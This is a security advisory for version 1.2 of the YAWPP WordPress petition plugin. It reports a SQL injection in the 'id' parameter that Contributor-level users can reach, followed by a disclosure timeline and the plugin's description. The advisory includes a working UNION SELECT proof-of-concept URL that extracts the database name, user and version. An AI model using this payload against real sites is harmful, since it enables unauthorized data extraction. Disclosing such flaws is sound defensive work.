wp-plugin : yawpp

Plugin Details
Plugin Name: wp-plugin : yawpp
Effected Version : 1.2 (and most probably lower version's if any)
Vulnerability : Injection
Identified by : anantshri
WPScan Reference URL

Technical Details
Minimum Level of Access Required : Contributor
PoC - (Proof of Concept) :

http://localhost/wp-admin/admin.php?page=yawpp§ion=update&id=2 union select 1,3,concat(database(),system_user(),@@version),2,user(),4




Vulnerable Parameter : “id”


Vulnerable pages : multiple pages where it is used.


Trac ChangeLog : https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=834445%40yawpp&old=824042%40yawpp&sfp_email=&sfph_mail=#file36

Disclosure Timeline
Vendor Contacted : 2013-12-21
Plugin Status : Updated on 2014-01-07
Public Disclosure : May 28, 2014
CVE Number :
Plugin Description :
[| YAWPP (Yet Another Wordpress Petition Plugin) is a really simple plugin that allows you to add petitions forms and signatories to your pages or posts by adding shortcodes. It allows you to create highly customisable petition in a really easy way. = Features = NEW * An option to turn "unique" some fields in order not to allow people to sign more than one time * An Export option to export signatories list in a Excel file * English translation YAWPP add a new admin page where you can : * Create new petitions * Choose the maximum signatories you wish to display * Add some fields to your petition * Turn "private" some fields in order not to show them when displaying the signatories list. * See the list of petitions created * See the list of signatories for each petition * Enable/Disable each petition * Delete each petition * Delete each signatory With YAWPP you can create any petition you want and add any field you want to your signing form. For each field you add, you can choose what type of field you want to add : * text : A simple text field * Comment : A textarea field * Mail : A mail field * Checkbox : A simple checkbox = Easy to use = In order to include your petition form or signatories list, you need to add shortcodes in your page/post as in this exemple : * [yawpp-form-ID] For the petition form * [yawpp-signs-ID] For the signatories list * [yawpp-num-signs-ID] to show the number of signatories = Coming Soon = * Choose if you wish to send a confirmation mail to each signatory If you have suggestion for a new add-on, feel free to email me at seb@le-gall.net YAWPP is developed by [Sébastien Le Gall](http://ostenta.fr "Ostenta") ]